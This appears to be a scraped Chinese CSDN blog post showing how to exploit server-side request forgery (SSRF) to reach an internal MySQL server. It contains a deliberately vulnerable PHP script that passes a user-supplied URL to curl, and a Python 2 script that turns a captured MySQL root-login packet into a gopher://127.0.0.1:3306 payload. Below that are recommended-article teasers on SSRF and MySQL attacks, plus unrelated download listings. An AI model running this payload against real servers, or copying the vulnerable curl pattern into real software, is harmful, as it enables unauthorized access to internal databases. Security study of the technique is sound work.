mysql ssrf_ssrf爆破mysql

最新推荐文章于 2022-04-19 17:15:43 发布
最新推荐文章于 2022-04-19 17:15:43 发布
阅读量75 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36274355/article/details/113229113
版权

php ssrf 代码

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $_GET['url']);

#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);

$data =curl_exec($ch);

curl_close($ch);

echo $data;

?>

抓包跟踪tcp流

e6ccab6f50de938914128bb1c28c3514.png

tcp流原始数据处理 进行urlencode

python 数据处理

import urllib

s="""5000000185a60f0000000001210000000000000000000000000000000000000000000000726f6f7400143cf76dd39987f1d2648aabfc4ae53cf62e826ea76d7973716c5f6e61746976655f70617373776f726400

210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031"""

s = "".join(s.split())

def encode(s):

a = [s[2*i:2*i+2] for i in xrange(len(s)/2)]

return "gopher://127.0.0.1:3306/_%" + "%".join(a)

s = encode(s)

print "[+ local]", s

s = urllib.quote(s)

print "[+ url]", s

效果:

9e5cdf6b05c0ad0746c0876f00e56def.png

兀亚子
关注
mysql ssrf_Mysql利用姿势小结
weixin_33998152的博客
01-19 736
本文主要讨论 mysql 在 Linux 环境下通过 mysql 配置、mysql语句以及结合系统配置,进行文件读取;shell写入;udf提权;和mysqlSSRF中的利用。(有许多踩坑点)读文件:load_fileload_file 在渗透过程中也就是读取文件,或者sql盲注的时候可以通过dnslog加快注入速度。本文这一节就对于load_file 读取文件的利用方式进行一个小结。如果还有更...
CTF ssrf 01 ssrf简介
aaashen的专栏
09-29 1534
CTF ssrf 01 ssrf简介简介漏洞危害SSRF漏洞相关的函数和协议Php中产生ssrf漏洞的函数curl_exec漏洞代码示例Curl可利用协议与漏洞SSRF漏洞定位判断漏洞存在的方法容易出现SSRF的地方 简介 SSRF (server-site request forgery,服务端请求伪造) 是一种构造请求, 由服务端发起请求的安全漏洞。 一般情况下,攻击者无法直接访问到内网资源,但如果服务器存在SSRF漏洞,攻击者就可以利用SSRF攻击访问外网无法访问的内网资源。 SSRF漏洞形成的原因
mysql ssrf_ssrf与mysql爱恨情仇
weixin_33122261的博客
01-19 213
SSRF与Mysql0x01域名:端口:80 443 22cms指纹:HisiPHP源码:后台:物理路径:/var/www/html/www.xxx.io/public/index.phpApache:配置不当存在遍历0x02通过对区块浏览器抓包发现一个远程调用接口猜测并确认该点存在ssrf漏洞继续确认这里我就能100%确定该地方存在ssrf 到了这里我们就可以开始端口扫描了然后使用burp得In...
SSRF
kuiguowei的博客
01-16 1368
SSRF如何产生的? SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4078
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5471
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
SSRF-Vulnerable-Lab靶场训练
weixin_44023442的博客
01-28 2152
参考文章 SSRF-Vulnerable-Lab tag: #SSRF Ref: 1、file_get_content.php 提取并显示指定文件内容的应用程序代码 在编程语言中,有一些函数可以获取本地保存文件的内容。这些功能可能能够从远程URL以及本地文件(例如PHP中的file_get_contents)中获取内容。 如果没有对输入内容进行处理,或者处理的不够严格,将有可能导致SSRF漏洞攻击。 输入:file_get_content.php 显示: 直接暴露源码 输入:file:///C:/W
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 1万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
【web安全】SSRF的各种利用方式
HBohan的博客
04-19 1874
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
ssrf知识点总结
hackzkaq的博客
11-25 1806
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一.ssrf基础知识 ssrf的定义 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞, 一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求时由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统)。 ssrf的成因 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 例如,黑客操
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1359
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
mysql ssrf_ssrf攻击内网应用
weixin_36257799的博客
02-17 459
一、weblogic ssrf攻击redisWeblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进一步实现端口探测。该漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp,我们使用burpsuite访问如下url进行测试。http://192.168.80.170:35402/uddiexplorer/SearchPublicRegis...
mysql ssrf_SSRF Mysql 学习记录
weixin_30305727的博客
01-19 506
SSRF 与内网 MYSQL 学习记录1.前情提要做到一道CTF题需要,结合网络上各位大佬的经验把过程结合总结学习了一下。萌新做题随机需求学习(顺便第一次尝试规范格式写博客)2.环境搭建首先自己本地搭建APACHE/NGINX PHP环境测试KALI2020服务机 :10.0.0.135win10客户机ssrf.php$ch= curl_init(); //创建一个新cURL资源curl_seto...
测表自动组装机_三维3D设计图纸.zip
09-29
测表自动组装机_三维3D设计图纸.zip
美萍民宿客栈收银管理系统标准版2021v1
09-29
美萍民宿客栈收银管理系统标准版2021v1官方正式版,要有加密狗才可以安装使用。
基于ThinkPHP6的ChatGPT接口接入与调用设计源码
最新发布
09-29
该项目是一款基于ThinkPHP6框架开发的ChatGPT接口接入与调用设计源码,包含51个文件,其中包括33个PHP源代码文件、4个HTML文件、4个Git忽略文件、2个文本文件、2个Markdown文件、1个htaccess文件、1个JSON文件、1个锁定文件和1个ICO文件。该系统实现了对ChatGPT接口的调用与集成,适用于需要集成智能聊天功能的Web应用开发。
基于C#的教师授课系统设计与实现.docx
09-29
基于C#的教师授课系统设计与实现.docx
基于asp.net的房产公司综合信息管理系统设计与实现.docx
09-29
基于asp.net的房产公司综合信息管理系统设计与实现.docx
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
05-23
MySQL SSF漏洞则是一种特殊的SSRF漏洞,可以通过构造恶意请求,向MySQL数据库发送任意数据请求,导致数据库的敏感信息泄露或者被攻击者利用进行内网探测、打redis等操作。 下面是一个简单的漏洞利用代码: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值